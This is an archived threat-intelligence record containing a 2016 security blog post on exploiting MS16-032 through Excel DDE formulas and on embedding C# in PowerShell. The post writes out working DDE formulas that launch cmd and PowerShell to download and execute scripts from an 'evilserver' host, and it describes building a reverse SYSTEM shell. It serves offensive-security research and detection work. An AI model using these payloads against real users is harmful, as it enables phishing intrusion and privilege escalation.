{
	"id": "ae8a034d-7e41-4aec-b3dc-392b04a5db0a",
	"created_at": "2026-04-06T00:15:59.515237Z",
	"updated_at": "2026-04-10T03:20:17.368679Z",
	"deleted_at": null,
	"sha1_hash": "87f09c2a16dd5ea99b538aed3029f7847f126f77",
	"title": "PowerShell, C-Sharp and DDE The Power Within",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 79960,
	"plain_text": "PowerShell, C-Sharp and DDE The Power Within\r\nArchived: 2026-04-05 18:28:39 UTC\r\naka Exploiting MS16-032 via Excel DDE without macros. The modified exploit script and video are at the end.\r\nA while ago this cool PowerShell exploit for MS16-032 was released by FuzzySecurity. The vulnerability\r\nexploited was in the secondary login function, which had a race condition for a leaked elevated thread handle, we\r\nwont go into much details about the vulnerability here though. It is a really awesome vulnerability if you want to\r\nread more details about it, I suggest you read James Forshaw’s blog post at Project Zero.\r\nWhat caught my eyes however was that FuzzySecurity used C# to import functions from DLLs and use them\r\nthrough the PowerShell exploit. Also around the same time this blog post about the Excel DDE command\r\nexecution appeared, so we played around with it, even used it on a targeted goal oriented assessment with great\r\nsuccess (5 out of the 9 emails sent got shells).\r\nI believe combining these new techniques would make an interesting challenge and blog post, that I hope would\r\nbe helpful to everyone. In this article we will discuss MS Excel DDE, embedding C# in PowerShell and loading\r\nfunctions from DLLs through it.\r\nPowerShell’s True power:\r\nLooking at the exploit code, I was intrigued by the Dllimports and C# code that was in there. I didn’t know that\r\nwas possible to import DLLs and C#, so a bit of research was in order. Turns out embedding C# into PS is very\r\neasy as I will demonstrate below. For PS to execute the C# all we need to do is put the C# code between “Add-Type -TypeDefinition @” C# code “@” at the beginning of the PS script. Let’s look at the below example and\r\nexamine it step by step\r\nIf you save the above as msg.ps1 and execute from PowerShell you will get a message box pop-up. A simple\r\nwalk-through of the code; first we add a type definition with our C# Code, next we include our main headers, after\r\nthat a class is instantiated with the same name as the DLL file we want to import guess this is not a must though,\r\nhttps://sensepost.com/blog/2016/powershell-c-sharp-and-dde-the-power-within/\r\nPage 1 of 3\n\nthen DllAtribute is used to import User32.dll and set the CharSet to Unicode that’s why we used MessageBoxW\r\ninstead of MessageBoxA, and lastly we add a prototype to the function we want to call from the dll. A function\r\nprototype is usually found in C header files so the application knows what the library function argument types are\r\nand the return value type as well. Without the prototype any C application would not know how to call the\r\nrequired function. You will also notice that in the original exploit code, struct definitions are also added when\r\nrequired by a function as an In/Out argument.\r\nThis shows how powerful PS scripts can get, well powerful enough to pop MessageBoxW.\r\nMS Excel Dynamic Data Exchange (DDE):\r\nAround the same time another article came out to remind us that DDE can be used to perform command execution\r\nthrough Excel sheets formulas, the only down side is that the user gets two prompts instead on one, one to enable\r\nlinks and one to execute our payload, however this didn’t stop unaware users from clicking OK to both. DDE is\r\nused by Excel workbooks for dynamic live data update as a sort of inter process communication, it allows\r\napplications to be called from within Excel formulas and even web requests to return live data to the WorkBook,\r\nmore information about DDE commands can be found here. Actually, the first prompt the user has to accept is to\r\nallow the DDE links to update live data, the formula to execute CMD in Excel is very simple, just paste the\r\nfollowing into any cell and click enter.\r\n=cmd|'/c calc.exe'!A1\r\nThe /c can be changed to /k for a presisitant cmd.exe shell, the first part of the payload instructs MS Excel to\r\nexecute cmd.exe the extension part is ommitted, the second part is the arguments for the application, during\r\ntesting it turns out that this always have to be between single quotes, easy enough, well not really, There are a\r\ncouple of length restrictions on the executable name and arguments, that doesn’t allow us to get more out of this,\r\nfor example you will not be able to execute PowerShell.exe from the DDE directly because of the length\r\nrestriction, however this can be done by passing PowerShell.exe as an argument to CMD.exe. This would add\r\nmore bytes to the already restricted 1024 byte argument length, the 1024 is the maximum cmd length for\r\nCreateProcess() function. This is not such a big problem  can instruct powershell to remotely load our script and\r\nexecute using the following DDE for encoded payloads.\r\n=cmd|'/c powershell.exe -w hidden $e=(New-Object System.Net.WebClient).DownloadString(\\\"http://evilse\r\nAnd the following for decoded scripts\r\n=cmd|'/c powershell.exe -w hidden $e=(New-Object System.Net.WebClient).DownloadString(\\\"http://evilse\r\nLater, Etienne, pointed out that we don’t need powershell as it also works to point “cmd /c” directly at a .bat script\r\nhosted in a webdav directory. This gets downloaded and executed automagically:\r\n=cmd|’/c \\\\evilserver.com\\sp.bat;IEX $e’!A1\r\nhttps://sensepost.com/blog/2016/powershell-c-sharp-and-dde-the-power-within/\r\nPage 2 of 3\n\nPhun Phun all around:\r\nI know it’s a boring article so far, so to get things intresting I decided to combine everything discussed so far to\r\npop a remote SYSTEM shell from unpriveleged user Excel sheet using the above DDE commands to remotely\r\nload and execute a modified MS16-032 powershell module to get reverse SYSTEM shell. The original exploit\r\ncode only popped calc so i had to add the WSASockets functions and structs to be able to call a reverse shell the\r\nidea is simple really, reverse shell code works by executing CMD.exe with the process handles set to an open\r\nsocket handle in the STARTUPINFO structure. Thus we needed to do is add the correct WSASockets Structs and\r\nneeded function prototypes from the ws2_32 Dll import.\r\nWSAStartup -\u003e WSASocket -\u003e WSAConnect\r\nAnd pass the Socket handle to the process STARTUPINFO structure hStdInput, hStdOutput, hStdError properties.\r\nand finally this happened.\r\nSource: https://sensepost.com/blog/2016/powershell-c-sharp-and-dde-the-power-within/\r\nhttps://sensepost.com/blog/2016/powershell-c-sharp-and-dde-the-power-within/\r\nPage 3 of 3",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://sensepost.com/blog/2016/powershell-c-sharp-and-dde-the-power-within/"
	],
	"report_names": [
		"powershell-c-sharp-and-dde-the-power-within"
	],
	"threat_actors": [],
	"ts_created_at": 1775434559,
	"ts_updated_at": 1775791217,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/87f09c2a16dd5ea99b538aed3029f7847f126f77.pdf",
		"text": "https://archive.orkl.eu/87f09c2a16dd5ea99b538aed3029f7847f126f77.txt",
		"img": "https://archive.orkl.eu/87f09c2a16dd5ea99b538aed3029f7847f126f77.jpg"
	}
}